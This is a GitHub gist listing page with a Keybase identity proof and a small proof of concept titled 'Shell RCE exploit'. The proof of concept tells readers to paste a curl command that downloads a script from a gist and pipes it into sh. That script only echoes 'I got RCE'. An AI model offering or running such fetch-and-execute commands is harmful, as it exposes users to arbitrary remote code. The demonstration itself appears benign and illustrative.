Skip to content

Instantly share code, notes, and snippets.

@CCoffie
CCoffie / keybase.md
Last active January 6, 2017 04:33
keybase.md

Keybase proof

I hereby claim:

  • I am CCoffie on github.
  • I am c_coffie (https://keybase.io/c_coffie) on keybase.
  • I have a public key whose fingerprint is 9373 4088 1883 AF45 9951 7066 EBEA 2FBC CFC8 9741

To claim this, I am signing this object:

#!/bin/sh
echo "I got RCE"
@CCoffie
CCoffie / ShellRCEExploit.md
Last active October 10, 2019 15:18
Shell RCE exploit

Just copy and paste the following into your shell to see the POC

sh -c "$(curl -fsSL https://gist.githubusercontent.com/CCoffie/2f3ce4e5b1722bad650f0021006660af/raw/41d7cbaf636f2fbb0d857021c3e3e943166f3c82/rce-poc.sh)"